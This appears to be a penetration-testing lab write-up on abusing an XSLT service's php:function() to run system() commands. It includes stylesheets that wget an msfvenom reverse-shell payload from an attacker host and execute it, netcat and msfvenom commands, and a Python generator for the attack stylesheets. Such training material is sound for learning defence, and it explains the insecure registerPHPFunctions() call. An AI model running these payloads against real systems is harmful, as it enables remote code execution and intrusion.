LM10b XSLT To Code Execution
You are performing a penetration test against a web application (172.16.64.191) with a clear
functionality: Transform data. Figure out its logic and try to abuse it.
• Browser
• Text editor
• Netcat
• Nmap
• Metasploit
• HTTP Server
Take a look at the application. Perform reconnaissance and figure out whether an XSLT engine is
employed by the application.
Try submitting/uploading various malicious files to the underlying XSLT engine to identify whether the
parser is insecurely configured. Executing code will prove that it is.
Hint: Try searching online for “calling php functions in xsl 1.0”.
If you navigate to 172.16.64.191, you will come across a “transformation service”. Such services usually
employ XSLT. You can upload two files (an XML document and a stylesheet) and then choose “transform”. If
you do that, you will be taken to a results page containing the transformed output.
Let’s make sure that an XSLT engine is under the hood. To do that we will use the two files below.
sample.xml
<?xml version="1.0"?>
<root>something</root>
detect.xsl
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/">
<!-- system-property() is standard XSLT 1.0; the values identify the engine -->
Vendor: <xsl:value-of select="system-property('xsl:vendor')"/>
Version: <xsl:value-of select="system-property('xsl:version')"/>
</xsl:template>
</xsl:stylesheet>
After uploading the above files and clicking “transform”, the transformed output should identify the
engine (vendor and XSLT version), confirming that an XSLT engine is present.
As we already have a dummy XML file, we can focus on modifying the XSL stylesheet. At this point you
need to look for online documentation of the XSL parser in use. Already knowing the version, search for
“calling php functions in xsl 1.0” or something similar, which should lead you to pages like the one
below.
http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls
Using code from the above website, let’s construct another XSL file that should execute some code.
exec.xsl:
<!--
- Call a PHP function from XSLT 1.0 through the php:function() extension
-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl"
version="1.0">
<!-- The php namespace exposes php:function() when the application has called registerPHPFunctions() -->
<xsl:template match="/">
<html>
<!-- Call PHP's system() with the command as its argument; the command output lands in the transformed page -->
<xsl:value-of select="php:function('system','uname -a')" />
</html>
</xsl:template>
</xsl:stylesheet>
Transforming the dummy XML used previously with the above XSL results in code execution: the output
page contains the result of uname -a. This works only because the application calls
XSLTProcessor::registerPHPFunctions() without an allowlist of function names before running the
transformation; that single call is what makes the parser insecure, and a service that never calls it (or
passes only harmless functions to it) is not exploitable this way.
As code execution is confirmed, we need to turn it into a fully functional reverse shell. There are
multiple ways to do it; we will show just one, but any method that leads to a reverse shell is acceptable.
First, as we know the system architecture from the uname -a output, we can generate a Metasploit payload
using msfvenom (the Metasploit payload generator). We will also use Python’s SimpleHTTPServer to host it.
In what follows the payload is saved as a file named 53 and served on port 443 (binding a port below 1024
requires root).
The next step is to prepare an XSL stylesheet that makes the victim system download that file. Of
course, you need to check your tap0 IP address so that the reverse shell is downloaded from the proper
location. In our case the IP address was 172.16.64.3.
exec.xsl (updated):
<!--
- Stage the payload: make the target fetch it from our HTTP server
-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl"
version="1.0">
<!-- The php namespace exposes php:function() when the application has called registerPHPFunctions() -->
<xsl:template match="/">
<html>
<!-- system() runs wget on the target; the file is written to /tmp where the web server user can write -->
<xsl:value-of select="php:function('system','wget http://172.16.64.3:443/53 -O /tmp/53')" />
</html>
</xsl:template>
</xsl:stylesheet>
After uploading this file and running the transformation, we can observe a GET request for /53 in the
log of our Python HTTP server.
This means the target system successfully downloaded the payload. Now we can execute the reverse
shell: we first need to make the file executable and then launch it.
In the meantime, don’t forget to set up a netcat listener on the port the reverse shell will connect to
(port 53 is privileged, so run it as root):
nc -lvp 53
Let’s create the following stylesheet to make our payload executable & execute the reverse shell.
<!--
- Make the downloaded payload executable and run it
-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl"
version="1.0">
<!-- The php namespace exposes php:function() when the application has called registerPHPFunctions() -->
<xsl:template match="/">
<html>
<!-- Two system() calls in document order: chmod first, then launch the reverse shell -->
<xsl:value-of select="php:function('system','chmod +x /tmp/53')" />
<xsl:value-of select="php:function('system','/tmp/53')" />
</html>
</xsl:template>
</xsl:stylesheet>
By uploading and transforming the dummy XML with the above stylesheet, we should obtain a reverse
shell on our netcat listener. Note that system('/tmp/53') does not return while the shell is alive, so the
transformation request in the browser will appear to hang; that is expected.
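Each stage above is the same stylesheet with a different command, and hand-editing it breaks as soon as the command contains a quote, an ampersand or an angle bracket. The following Python helper is an added example (not part of the original lab and not the application's code) that generates the three stylesheets programmatically, escaping the command for both the XML parser and XPath 1.0's string-literal rules, and parses each result back to confirm what the XSLT engine will actually evaluate. The attacker IP, ports and the output file names default to the values used in this write-up and are assumptions.

```python
"""Generate the php:function() XSLT stylesheets used in this lab.

Added example, not code from the original write-up. It reproduces the three
stylesheets shown above (run uname -a, download the payload with wget, chmod
and execute it) but builds them programmatically, so a command containing
quotes, &, < or > still survives both the XML parser and XPath 1.0's
string-literal rules. The attacker IP, ports and file names are assumptions
taken from the write-up.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
PHP_NS = "http://php.net/xsl"   # namespace PHP's XSLTProcessor binds to php:function()
ATTR_ENTITIES = {'"': "&quot;"}  # extra escaping needed inside a double-quoted attribute


def xpath_literal(s: str) -> str:
    """Return an XPath 1.0 string literal that evaluates to s.

    XPath 1.0 has no escape sequence inside a string literal, so a value that
    contains both ' and " has to be assembled with concat().
    """
    if "'" not in s:
        return f"'{s}'"
    if '"' not in s:
        return f'"{s}"'
    parts = []
    for chunk in s.split("'"):
        if chunk:
            parts.append(f"'{chunk}'")
        parts.append("\"'\"")          # a single quote, as a double-quoted literal
    parts.pop()                        # one separator too many after the last chunk
    return "concat(" + ", ".join(parts) + ")"


def php_call(function: str, *args: str) -> str:
    """XPath expression php:function('function', arg, ...)."""
    literals = [xpath_literal(a) for a in (function, *args)]
    return "php:function(" + ", ".join(literals) + ")"


def build_stylesheet(commands) -> str:
    """XSLT 1.0 stylesheet that runs each shell command through PHP's system().

    Nothing executes unless the transforming application called
    XSLTProcessor::registerPHPFunctions(); on a service that never does, the
    php:function() calls simply fail.
    """
    lines = [
        f'<xsl:stylesheet version="1.0" xmlns:xsl="{XSL_NS}" xmlns:php="{PHP_NS}">',
        '  <xsl:template match="/">',
        "    <html>",
    ]
    for cmd in commands:
        expr = escape(php_call("system", cmd), ATTR_ENTITIES)
        lines.append(f'      <xsl:value-of select="{expr}"/>')
    lines += ["    </html>", "  </xsl:template>", "</xsl:stylesheet>"]
    return "\n".join(lines) + "\n"


def lab_stylesheets(attacker_ip="172.16.64.3", http_port=443, shell_port=53):
    """The three stages of the write-up; the file names are our own choice."""
    dest = f"/tmp/{shell_port}"
    return {
        "exec.xsl": build_stylesheet(["uname -a"]),
        "download.xsl": build_stylesheet(
            [f"wget http://{attacker_ip}:{http_port}/{shell_port} -O {dest}"]
        ),
        "shell.xsl": build_stylesheet([f"chmod +x {dest}", dest]),
    }


def select_expressions(stylesheet: str):
    """Parse a stylesheet back and return the XPath of every xsl:value-of.

    Self-check: if the XML is not well formed the parser raises, and the
    returned expressions are exactly what the XSLT engine will see after
    attribute un-escaping.
    """
    root = ET.fromstring(stylesheet)
    return [el.get("select") for el in root.iter(f"{{{XSL_NS}}}value-of")]


if __name__ == "__main__":
    for name, text in lab_stylesheets().items():
        with open(name, "w") as fh:
            fh.write(text)
        print(name, select_expressions(text))
```

Upload each generated file in turn together with sample.xml, in the order exec.xsl, download.xsl, shell.xsl. The payload itself is not produced by this script; assuming a 32-bit Linux target (pick the architecture from the uname -a output), something like `msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.64.3 LPORT=53 -f elf -o 53` followed by `python -m SimpleHTTPServer 443` in the same directory matches the URL the download stage requests.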